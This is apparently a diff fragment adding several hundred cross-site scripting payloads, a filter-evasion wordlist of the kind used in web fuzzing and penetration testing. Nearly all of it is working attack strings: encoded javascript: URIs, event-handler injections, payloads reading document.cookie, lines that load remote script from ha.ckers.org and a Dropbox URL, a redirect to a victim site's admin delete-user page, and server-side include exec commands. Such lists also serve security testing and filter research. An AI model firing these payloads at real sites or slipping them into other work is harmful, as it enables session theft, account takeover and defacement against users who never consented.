+ <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
729
+ <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
730
+ <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
731
+ <script ~~~>alert(0%0)</script ~~~>
732
+ <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
733
+ <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
734
+ <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
735
+ &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
736
+ &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
737
+ <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
738
+ <div/style="width:expression(confirm(1))">X</div> {IE7}
739
+ <iframe/%00/ src=javaSCRIPT&colon;alert(1)
740
+ //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
741
+ /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
742
+ //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
743
+ </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
744
+ <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
745
+ </plaintext\></|\><plaintext/onmouseover=prompt(1)
746
+ </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
747
+ <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
748
+ <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
749
+ <iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
750
+ <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
751
+ <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
752
+ <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
753
+ <var onmouseover="prompt(1)">On Mouse Over</var>
754
+ <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
755
+ <img src="/" =_=" title="onerror='prompt(1)'">
756
+ <%<!--'%><script>alert(1);</script -->
757
+ <script src="data:text/javascript,alert(1)"></script>
758
+ <iframe/src \/\/onload = prompt(1)
759
+ <iframe/onreadystatechange=alert(1)
760
+ <svg/onload=alert(1)
761
+ <input value=<><iframe/src=javascript:confirm(1)
762
+ <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
763
+ http://www.<script>alert(1)</script .com
764
+ <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
765
+ <svg><script ?>alert(1)
766
+ <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
767
+ <img src=`xx:xx`onerror=alert(1)>
768
+ <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
769
+ <math><a xlink:href="//jsfiddle.net/t846h/">click
770
+ <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
771
+ <svg contentScriptType=text/vbs><script>MsgBox+1
772
+ <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
773
+ <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
774
+ <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
775
+ <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
776
+ <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
777
+ <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
778
+ <script>+-+-1-+-+alert(1)</script>
779
+ <body/onload=&lt;!--&gt;&#10alert(1)>
780
+ <script itworksinallbrowsers>/*<script* */alert(1)</script
781
+ <img src ?itworksonchrome?\/onerror = alert(1)
782
+ <svg><script>//&NewLine;confirm(1);</script </svg>
783
+ <svg><script onlypossibleinopera:-)> alert(1)
784
+ <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
785
+ <script x> alert(1) </script 1=2
786
+ <div/onmouseover='alert(1)'> style="x:">
787
+ <--`<img/src=` onerror=alert(1)> --!>
788
+ <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
789
+ <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
790
+ "><img src=x onerror=window.open('https://www.google.com/');>
791
+ <form><button formaction=javascript&colon;alert(1)>CLICKME
792
+ <math><a xlink:href="//jsfiddle.net/t846h/">click
793
+ <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
794
+ <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
795
+ <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
796
+ <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
797
+ ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
798
+ <IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
799
+ <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
800
+ <IMG SRC=”jav ascript:alert(‘XSS’);”>
801
+ <IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>
802
+ <<SCRIPT>alert(“XSS”);//<</SCRIPT>
803
+ %253cscript%253ealert(1)%253c/script%253e
804
+ “><s”%2b”cript>alert(document.cookie)</script>
805
+ foo<script>alert(1)</script>
806
+ <scr<script>ipt>alert(1)</scr</script>ipt>
807
+ <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
808
+ <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
809
+ <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
810
+ <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
811
+ <BODY ONLOAD=alert(‘XSS’)>
812
+ <INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
813
+ <IMG SRC=”javascript:alert(‘XSS’)”
814
+ <iframe src=http://ha.ckers.org/scriptlet.html <
815
+ javascript:alert("hellox worldss")
816
+ <img src="javascript:alert('XSS');">
817
+ <img src=javascript:alert(&quot;XSS&quot;)>
818
+ <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
819
+ <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
820
+ <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
821
+ <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
822
+ <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
823
+ <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
824
+ <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
825
+ <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
826
+ <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
827
+ <<SCRIPT>alert("XSS");//<</SCRIPT>
828
+ <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
829
+ ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
830
+ <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
831
+ <script>alert("XSS");</script>&search=1
832
+ 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
833
+ <h1><font color=blue>hellox worldss</h1>
834
+ <BODY ONLOAD=alert('hellox worldss')>
835
+ <input onfocus=write(XSS) autofocus>
836
+ <input onblur=write(XSS) autofocus><input autofocus>
837
+ <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
838
+ <form><button formaction="javascript:alert(XSS)">lol
839
+ <!--<img src="--><img src=x onerror=alert(XSS)//">
840
+ <![><img src="]><img src=x onerror=alert(XSS)//">
841
+ <style><img src="</style><img src=x onerror=alert(XSS)//">
842
+ <? foo="><script>alert(1)</script>">
843
+ <! foo="><script>alert(1)</script>">
844
+ </ foo="><script>alert(1)</script>">
845
+ <? foo="><x foo='?><script>alert(1)</script>'>">
846
+ <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
847
+ <% foo><x foo="%><script>alert(123)</script>">
848
+ <div style="font-family:'foo&#10;;color:red;';">LOL
849
+ LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
850
+ <script>({0:#0=alert/#0#/#0#(0)})</script>
851
+ <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
852
+ &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;
853
+ \\";alert('XSS');//
854
+ &lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt;
855
+ &lt;INPUT TYPE=\"IMAGE\" SRC=\"javascript&#058;alert('XSS');\"&gt;
856
+ &lt;BODY BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
857
+ &lt;BODY ONLOAD=alert('XSS')&gt;
858
+ &lt;IMG DYNSRC=\"javascript&#058;alert('XSS')\"&gt;
859
+ &lt;IMG LOWSRC=\"javascript&#058;alert('XSS')\"&gt;
860
+ &lt;BGSOUND SRC=\"javascript&#058;alert('XSS');\"&gt;
861
+ &lt;BR SIZE=\"&{alert('XSS')}\"&gt;
862
+ &lt;LAYER SRC=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/LAYER&gt;
863
+ &lt;LINK REL=\"stylesheet\" HREF=\"javascript&#058;alert('XSS');\"&gt;
864
+ &lt;LINK REL=\"stylesheet\" HREF=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\"&gt;
865
+ &lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;
866
+ &lt;META HTTP-EQUIV=\"Link\" Content=\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\"&gt;
867
+ &lt;STYLE&gt;BODY{-moz-binding&#58;url(\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\")}&lt;/STYLE&gt;
868
+ &lt;XSS STYLE=\"behavior&#58; url(xss&#46;htc);\"&gt;
869
+ &lt;STYLE&gt;li {list-style-image&#58; url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
870
+ &lt;IMG SRC='vbscript&#058;msgbox(\"XSS\")'&gt;
871
+ &lt;IMG SRC=\"mocha&#58;&#91;code&#93;\"&gt;
872
+ &lt;IMG SRC=\"livescript&#058;&#91;code&#93;\"&gt;
873
+ žscriptualert(EXSSE)ž/scriptu
874
+ &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript&#058;alert('XSS');\"&gt;
875
+ &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&gt;
876
+ &lt;META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\"
877
+ &lt;IFRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/IFRAME&gt;
878
+ &lt;FRAMESET&gt;&lt;FRAME SRC=\"javascript&#058;alert('XSS');\"&gt;&lt;/FRAMESET&gt;
879
+ &lt;TABLE BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
880
+ &lt;TABLE&gt;&lt;TD BACKGROUND=\"javascript&#058;alert('XSS')\"&gt;
881
+ &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
882
+ &lt;DIV STYLE=\"background-image&#58;\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028&#46;1027\0058&#46;1053\0053\0027\0029'\0029\"&gt;
883
+ &lt;DIV STYLE=\"background-image&#58; url(javascript&#058;alert('XSS'))\"&gt;
884
+ &lt;DIV STYLE=\"width&#58; expression(alert('XSS'));\"&gt;
885
+ &lt;STYLE&gt;@im\port'\ja\vasc\ript&#58;alert(\"XSS\")';&lt;/STYLE&gt;
886
+ &lt;IMG STYLE=\"xss&#58;expr/*XSS*/ession(alert('XSS'))\"&gt;
887
+ &lt;XSS STYLE=\"xss&#58;expression(alert('XSS'))\"&gt;
888
+ exp/*&lt;A STYLE='no\xss&#58;noxss(\"*//*\");
889
+ xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\"XSS\"))'&gt;
890
+ &lt;STYLE TYPE=\"text/javascript\"&gt;alert('XSS');&lt;/STYLE&gt;
891
+ &lt;STYLE&gt;&#46;XSS{background-image&#58;url(\"javascript&#058;alert('XSS')\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
892
+ &lt;STYLE type=\"text/css\"&gt;BODY{background&#58;url(\"javascript&#058;alert('XSS')\")}&lt;/STYLE&gt;
893
+ &lt;!--&#91;if gte IE 4&#93;&gt;
894
+ &lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
895
+ &lt;!&#91;endif&#93;--&gt;
896
+ &lt;BASE HREF=\"javascript&#058;alert('XSS');//\"&gt;
897
+ &lt;OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\"&gt;&lt;/OBJECT&gt;
898
+ &lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt;
899
+ &lt;EMBED SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
900
+ &lt;EMBED SRC=\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"&gt;&lt;/EMBED&gt;
901
+ a=\"get\";
902
+ b=\"URL(\\"\";
903
+ c=\"javascript&#058;\";
904
+ d=\"alert('XSS');\\")\";
905
+ eval(a+b+c+d);
906
+ &lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\"xss\" implementation=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;
907
+ &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\"&gt;&#93;&#93;&gt;
908
+ &lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
909
+ &lt;XML ID=\"xss\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
910
+ &lt;SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"&gt;&lt;/SPAN&gt;
911
+ &lt;XML SRC=\"xsstest&#46;xml\" ID=I&gt;&lt;/XML&gt;
912
+ &lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;
913
+ &lt;HTML&gt;&lt;BODY&gt;
914
+ &lt;?xml&#58;namespace prefix=\"t\" ns=\"urn&#58;schemas-microsoft-com&#58;time\"&gt;
915
+ &lt;?import namespace=\"t\" implementation=\"#default#time2\"&gt;
916
+ &lt;t&#58;set attributeName=\"innerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\"&gt;
917
+ &lt;/BODY&gt;&lt;/HTML&gt;
918
+ &lt;SCRIPT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\"&gt;&lt;/SCRIPT&gt;
919
+ &lt;!--#exec cmd=\"/bin/echo '&lt;SCR'\"--&gt;&lt;!--#exec cmd=\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\"--&gt;
920
+ &lt;? echo('&lt;SCR)';
921
+ echo('IPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;'); ?&gt;
922
+ &lt;IMG SRC=\"http&#58;//www&#46;thesiteyouareon&#46;com/somecommand&#46;php?somevariables=maliciouscode\"&gt;
923
+ Redirect 302 /a&#46;jpg http&#58;//victimsite&#46;com/admin&#46;asp&deleteuser
924
+ &lt;META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\"&gt;
925
+ &lt;HEAD&gt;&lt;META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
926
+ &lt;SCRIPT a=\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
927
+ &lt;SCRIPT =\"&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
928
+ &lt;SCRIPT a=\"&gt;\" '' SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
929
+ &lt;SCRIPT \"a='&gt;'\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
930
+ &lt;SCRIPT a=`&gt;` SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
931
+ &lt;SCRIPT a=\"&gt;'&gt;\" SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
932
+ &lt;SCRIPT&gt;document&#46;write(\"&lt;SCRI\");&lt;/SCRIPT&gt;PT SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
933
+ &lt;A HREF=\"http&#58;//66&#46;102&#46;7&#46;147/\"&gt;XSS&lt;/A&gt;
934
+ &lt;A HREF=\"http&#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\"&gt;XSS&lt;/A&gt;
935
+ &lt;A HREF=\"http&#58;//1113982867/\"&gt;XSS&lt;/A&gt;
936
+ &lt;A HREF=\"http&#58;//0x42&#46;0x0000066&#46;0x7&#46;0x93/\"&gt;XSS&lt;/A&gt;
937
+ &lt;A HREF=\"http&#58;//0102&#46;0146&#46;0007&#46;00000223/\"&gt;XSS&lt;/A&gt;
938
+ &lt;A HREF=\"htt p&#58;//6 6&#46;000146&#46;0x7&#46;147/\"&gt;XSS&lt;/A&gt;
939
+ &lt;A HREF=\"//www&#46;google&#46;com/\"&gt;XSS&lt;/A&gt;
940
+ &lt;A HREF=\"//google\"&gt;XSS&lt;/A&gt;
941
+ &lt;A HREF=\"http&#58;//ha&#46;ckers&#46;org@google\"&gt;XSS&lt;/A&gt;
942
+ &lt;A HREF=\"http&#58;//google&#58;ha&#46;ckers&#46;org\"&gt;XSS&lt;/A&gt;
943
+ &lt;A HREF=\"http&#58;//google&#46;com/\"&gt;XSS&lt;/A&gt;
944
+ &lt;A HREF=\"http&#58;//www&#46;google&#46;com&#46;/\"&gt;XSS&lt;/A&gt;
945
+ &lt;A HREF=\"javascript&#058;document&#46;location='http&#58;//www&#46;google&#46;com/'\"&gt;XSS&lt;/A&gt;
946
+ &lt;A HREF=\"http&#58;//www&#46;gohttp&#58;//www&#46;google&#46;com/ogle&#46;com/\"&gt;XSS&lt;/A&gt;
947
+ &lt;
948
+ %3C
949
+ &lt
950
+ &lt;
951
+ &LT
952
+ &LT;
953
+ &#60
954
+ &#060
955
+ &#0060
956
+ &#00060
957
+ &#000060
958
+ &#0000060
959
+ &lt;
960
+ &#x3c
961
+ &#x03c
962
+ &#x003c
963
+ &#x0003c
964
+ &#x00003c
965
+ &#x000003c
966
+ &#x3c;
967
+ &#x03c;
968
+ &#x003c;
969
+ &#x0003c;
970
+ &#x00003c;
971
+ &#x000003c;
972
+ &#X3c
973
+ &#X03c
974
+ &#X003c
975
+ &#X0003c
976
+ &#X00003c
977
+ &#X000003c
978
+ &#X3c;
979
+ &#X03c;
980
+ &#X003c;
981
+ &#X0003c;
982
+ &#X00003c;
983
+ &#X000003c;
984
+ &#x3C
985
+ &#x03C
986
+ &#x003C
987
+ &#x0003C
988
+ &#x00003C
989
+ &#x000003C
990
+ &#x3C;
991
+ &#x03C;
992
+ &#x003C;
993
+ &#x0003C;
994
+ &#x00003C;
995
+ &#x000003C;
996
+ &#X3C
997
+ &#X03C
998
+ &#X003C
999
+ &#X0003C
1000
+ &#X00003C
1001
+ &#X000003C
1002
+ &#X3C;
1003
+ &#X03C;
1004
+ &#X003C;
1005
+ &#X0003C;
1006
+ &#X00003C;
1007
+ &#X000003C;
1008
+ \x3c
1009
+ \x3C
1010
+ \u003c
1011
+ \u003C
1012
+ &lt;iframe src=http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html&gt;
1013
+ &lt;IMG SRC=\"javascript&#058;alert('XSS')\"
1014
+ &lt;SCRIPT SRC=//ha&#46;ckers&#46;org/&#46;js&gt;
1015
+ &lt;SCRIPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js?&lt;B&gt;
1016
+ &lt;&lt;SCRIPT&gt;alert(\"XSS\");//&lt;&lt;/SCRIPT&gt;
1017
+ &lt;SCRIPT/SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
1018
+ &lt;BODY onload!#$%&()*~+-_&#46;,&#58;;?@&#91;/|\&#93;^`=alert(\"XSS\")&gt;
1019
+ &lt;SCRIPT/XSS SRC=\"http&#58;//ha&#46;ckers&#46;org/xss&#46;js\"&gt;&lt;/SCRIPT&gt;
1020
+ &lt;IMG SRC=\" javascript&#058;alert('XSS');\"&gt;
1021
+ perl -e 'print \"&lt;SCR\0IPT&gt;alert(\\"XSS\\")&lt;/SCR\0IPT&gt;\";' &gt; out
1022
+ perl -e 'print \"&lt;IMG SRC=java\0script&#058;alert(\\"XSS\\")&gt;\";' &gt; out
1023
+ &lt;IMG SRC=\"jav&#x0D;ascript&#058;alert('XSS');\"&gt;
1024
+ &lt;IMG SRC=\"jav&#x0A;ascript&#058;alert('XSS');\"&gt;
1025
+ &lt;IMG SRC=\"jav&#x09;ascript&#058;alert('XSS');\"&gt;
1026
+ &lt;IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29&gt;
1027
+ &lt;IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041&gt;
1028
+ &lt;IMG SRC=javascript&#058;alert('XSS')&gt;
1029
+ &lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;
1030
+ &lt;IMG \"\"\"&gt;&lt;SCRIPT&gt;alert(\"XSS\")&lt;/SCRIPT&gt;\"&gt;
1031
+ &lt;IMG SRC=`javascript&#058;alert(\"RSnake says, 'XSS'\")`&gt;
1032
+ &lt;IMG SRC=javascript&#058;alert(&quot;XSS&quot;)&gt;
1033
